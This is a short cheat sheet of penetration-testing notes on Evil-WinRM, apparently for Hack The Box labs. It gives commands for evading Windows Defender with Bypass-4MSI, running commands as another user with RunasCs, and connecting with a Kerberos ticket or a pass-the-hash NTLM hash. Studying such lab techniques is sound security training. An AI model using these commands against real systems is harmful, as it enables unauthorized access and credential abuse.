• Evil-WinRM

Evil-winrm

• menu
• upload
• download
• Bypass-4MSI command is used to evade defender before importing script.

Some commands won’t work on winrm as it is a remote connection and it needs local login priv

using ‣

we can run it

runasCs.exe {user} {pass} {command}

you can run it from local session from the winrm and we don’t have to pass cred just put x

runasCs.exe x x "query user" -l 9

using evil-winrm with kerberus ticket

evil-winrm -i dc01.vintage.htb -r vintage.htb
evil-winrm -i frizzdc.frizz.htb -r frizz.htb -k M.schoolbus.ccache

using NTLM hash

this is the hash Administrator:500:aad3b435b51404eeaad3b435b51404ee:9bff06fe611486579fb74037890fda96:::

evil-winrm -i dante.local -u Administrator -H 9bff06fe611486579fb74037890fda96